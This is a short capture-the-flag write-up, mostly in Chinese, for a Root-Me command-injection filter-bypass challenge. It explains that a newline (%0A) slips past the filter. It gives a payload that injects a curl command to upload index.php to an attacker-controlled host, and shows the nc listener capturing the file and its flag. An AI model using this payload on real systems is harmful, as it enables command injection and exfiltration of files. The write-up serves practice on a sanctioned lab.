Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.
找到此服务中的漏洞并加以利用。增加了一些保护措施。该标志位于index.php文件中。
两种结果:
ping ok
常用连接符:
& 前面无论真假,都会执行后面
&& 前面为假,则不会执行后面语句
| 无论真假都不会执行前面语句
|| 前面为真,则不会执行后面
以上无效 ,%0A 可用
此处使用 sleep 60s 判断后面语句是否执行
使用curl读取index.php
payload:ip=127.0.0.1%0acurl -F `filename=@index.php` *.*.*.*:9999 -------------------vps的ip地址
nc -lvvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from challenge01.root-me.org 49010 received!
POST / HTTP/1.1
Host: *.*.*.*:9999
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 1008
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------0fee3a45749c037a
--------------------------0fee3a45749c037a
Content-Disposition: form-data; name="filename"; filename="index.php"
Content-Type: application/octet-stream
<html>
<head>
<title>Ping Service</title>
</head>
<body>
<form method="POST" action="index.php">
<input type="text" name="ip" placeholder="127.0.0.1">
<input type="submit">
</form>
<pre>
<?php
$flag = "Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!";
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$ip = @preg_replace("/[\\\$|`;&<>]/", "", $_POST["ip"]);
$response = @shell_exec("timeout 5 bash -c ‘ping -c 3 ".$ip."‘");
$receive = @preg_match("/3 packets transmitted, (.*) received/s",$response,$out);
if ($out[1]=="3")
{
echo "Ping OK";
}
elseif ($out[1]=="0")
{
echo "Ping NOK";
}
else
{
echo "Syntax Error";
}
}
?>
</pre>
</body>
</html>
Command injection - Filter bypass
原文:https://www.cnblogs.com/abbin-blog/p/12111302.html